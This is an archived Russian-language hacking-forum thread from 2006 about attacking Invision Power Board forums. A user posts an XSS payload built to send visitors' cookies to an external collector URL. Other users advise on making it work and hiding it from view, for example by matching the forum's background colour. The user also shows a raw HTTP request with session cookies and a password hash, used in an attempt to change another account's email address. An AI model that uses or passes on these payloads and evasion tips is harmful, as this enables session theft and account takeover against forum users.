PDA

Просмотр полной версии : Powered by Invision Power Board(U) © 2003 IPS, Inc.

dv0rnik
12.11.2006, 04:47
Возможно эта тема уже изезжена на у меня несколько вопросов и прозьб в помощи советом
1:) при попытк вставить XSS : [em**com`=`][/url].com[/email] ` style=`background:url(javas*cript:document.images[1].src="http://antichat.ru/cgi-bin/s*.jpg?"+documen*t.cookie);`

В опрере выглядит воттак:
.com'>wj@wj.com ` style=`background:url(javascr*ipt:document.images[1].src="http://antichat.ru/cgi-bin/s*.jpg?"+do*cument.cookie);` как мне его замаскировать чтобы несветилось так сильно?

2: при подстановки скрипта в качестве аватара комне неприходят куки а просто приходят логи с какого IP адреса заходили и всё
Плиз прошу помощи
Diablo
12.11.2006, 05:00
Ну...звездочки вообщето убирать надо ;)
dv0rnik
12.11.2006, 05:08
звёздочки я здесь вставил а на форуме на котором тестировалось писал без звёздочек :)
dv0rnik
12.11.2006, 05:13
так же при отсылание этого скрипта в пм он работает на только в ИЕ в опере он палится блин а куки хочется :( темболее хеш на данной версии форума можно расифровать ведь он без соли :(
KPOT_f!nd
12.11.2006, 05:18
ЗАЮЗАЙ inetcrack
dv0rnik
15.11.2006, 01:16
И как эти дырки можно заделать неподскажите ?
и можно ли как небуть сменить мыло незная параля но зная хеш?
africanec
15.11.2006, 01:34
2Дворник нет.
п.с. если нестоит что без проверки пасса меняетса что очень врятли
dv0rnik
15.11.2006, 01:52
Проверка паса стоит но я пытался поменять при помощи http заголовка отправить:

POST /forums/index.php? HTTP/1.0
User-Agent: Opera/9.02 (Windows NT 5.1; U; ru)
Host: site.net
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Referer: http://site.net/forums/index.php?act=UserCP&CODE=08
Cookie: forum_read=a%3A1%3A%7Bi%3A15%3Bi%3A1163
497321%3B%7D; anonlogin=-1; member_id=1061; pass_hash=5f3249aa304055d63828af3bfab778f6; session_id=92af66c5aa31faf222e6a87af24e004a
Cookie2: $Version=1
Content-Length: 201
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive

act=UserCP&CODE=09&in_email_1=qwe%40rt.er&in
_email_2=qwe%40rt.er&password=123&regid=c04
06f65bd1257ba6ab5d8c79d780650&reg_code=
143102&change_email=%D1%EE%F5%F0%E0%ED
%E8%F2%FC+%E8%E7%EC%E5%ED%E5%ED%E8%FF

думал вместо password=123 вставить известный мне хеш , непрокатило :( извиняюсь за ламерство но попытка....
злюка
15.11.2006, 10:21
В опрере выглядит воттак:
.com'>wj@wj.com ` style=`background:url(javascr*ipt:document.images[1].src="http://antichat.ru/cgi-bin/s*.jpg?"+do*cument.cookie);` как мне его замаскировать чтобы несветилось так сильно?


вставь всё это дело в тэги или как вариант в тэг color с цветом фона форума
JIaMo
15.11.2006, 20:37
Возможно эта тема уже изезжена на у меня несколько вопросов и прозьб в помощи советом
1:) при попытк вставить XSS : [em**com`=`][/url].com[/email] ` style=`background:url(javas*cript:document.images[1].src="http://antichat.ru/cgi-bin/s*.jpg?"+documen*t.cookie);`

В опрере выглядит воттак:
.com'>wj@wj.com ` style=`background:url(javascr*ipt:document.images[1].src="http://antichat.ru/cgi-bin/s*.jpg?"+do*cument.cookie);` как мне его замаскировать чтобы несветилось так сильно?

Такое работает только в ие, в опере работать небудет